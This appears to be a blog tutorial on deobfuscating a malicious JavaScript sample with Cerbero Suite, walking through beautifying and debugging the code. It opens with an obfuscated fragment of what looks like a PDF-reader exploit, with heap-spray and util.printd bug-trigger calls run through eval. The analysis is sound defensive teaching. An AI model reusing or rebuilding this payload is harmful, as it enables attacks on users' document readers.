QjxT(56) + QjxT(43) + QjxT(48) + QjxT(61) + QjxT(42) + QjxT(55) + QjxT(49) + QjxT(48) + QjxT(126) + QjxT(42) + QjxT(44) + QjxT(55) + QjxT(57) + QjxT(57) + QjxT(59) + QjxT(44) + QjxT(1) + QjxT(60) + QjxT(43) + QjxT(57) + QjxT(118) + QjxT(119) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(37) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(43) + QjxT(42) + QjxT(55) + QjxT(50) + QjxT(112) + QjxT(46) + QjxT(44) + QjxT(55) + QjxT(48) + QjxT(42) + QjxT(58) + QjxT(118) + QjxT(124) + QjxT(111) + QjxT(112) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(126) + QjxT(100) + QjxT(126) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(124) + QjxT(114) + QjxT(126) + QjxT(48) + QjxT(59) + QjxT(41) + QjxT(126) + QjxT(26) + QjxT(63) + QjxT(42) + QjxT(59) + QjxT(118) + QjxT(119) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(42) + QjxT(44) + QjxT(39) + QjxT(126) + QjxT(37) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(51) + QjxT(59) + QjxT(58) + QjxT(55) + QjxT(63) + QjxT(112) + QjxT(48) + QjxT(59) + QjxT(41) + QjxT(14) + QjxT(50) + QjxT(63) + QjxT(39) + QjxT(59) + QjxT(44) + QjxT(118) + QjxT(48) + QjxT(43) + QjxT(50) + QjxT(50) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(35) + QjxT(126) + QjxT(61) + QjxT(63) + QjxT(42) + QjxT(61) + QjxT(54) + QjxT(118) + QjxT(59) + QjxT(119) + QjxT(126) + QjxT(37) + QjxT(35) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(43) + QjxT(42) + QjxT(55) + QjxT(50) + QjxT(112) + QjxT(46) + QjxT(44) + QjxT(55) + QjxT(48) + QjxT(42) + QjxT(58) + QjxT(118) + QjxT(124) + QjxT(111) + QjxT(112) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(126) + QjxT(100) + QjxT(126) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(124) + QjxT(114) + QjxT(126) + QjxT(48) + QjxT(59) + QjxT(41) + QjxT(126) + QjxT(26) + QjxT(63) + QjxT(42) + QjxT(59) + QjxT(118) + QjxT(119) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(35) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(45) + QjxT(46) + QjxT(44) + QjxT(63) + QjxT(39) + QjxT(1) + QjxT(54) + QjxT(59) + QjxT(63) + QjxT(46) + QjxT(118) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(42) + QjxT(44) + QjxT(55) + QjxT(57) + QjxT(57) + QjxT(59) + QjxT(44) + QjxT(1) + QjxT(60) + QjxT(43) + QjxT(57) + QjxT(118) + QjxT(119) + QjxT(101) + QjxT(84) + '';

eval(gZJkRLU);

Initially, i will save this encoded javascript into a file. I like to use Cerbero Suite Advance in order to reverse this because it has a lot of functionality. You can download it from https://cerbero.io/

Ok lets start. When the file has been saved with the payload. then we can do below steps

when the file has been loaded. it will by default be opened in the Hex mode. We need to convert bytes into text. You can press CTRL+R and select Conversion — Bytes to text and press OK

And select Codec as utf_8

Now it will open new Tab called Decoded bytes. We need to inform Cerbero that this text is actually a javascript code

The next steps is to beautify it. So that we will be easier to understand it. You can do it by CTRL+R and select Beautify JavaScript

So the next step is to debug it. We can see that at the very bottom of the code, there is an eval code. We can use this to see decoded javascript with debug function from Cerbero. Now you can again press CTRL+R and select Debug JavaScript, and Press OK

Press OK again on the below confirmation

There is a new window will be opened to debug the code in the debugging mode. You can press Run to start the debugging

Yeah … when the code is run then you can basically see the actual code after the decode process. So we can now futher analyze the payload because it is now become human readable

That is it. Easy right ?. With the correct tools the code deobfuscation will run smooth. 🙂

Below is obfuscation technique that can be implemented in layers into a code

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s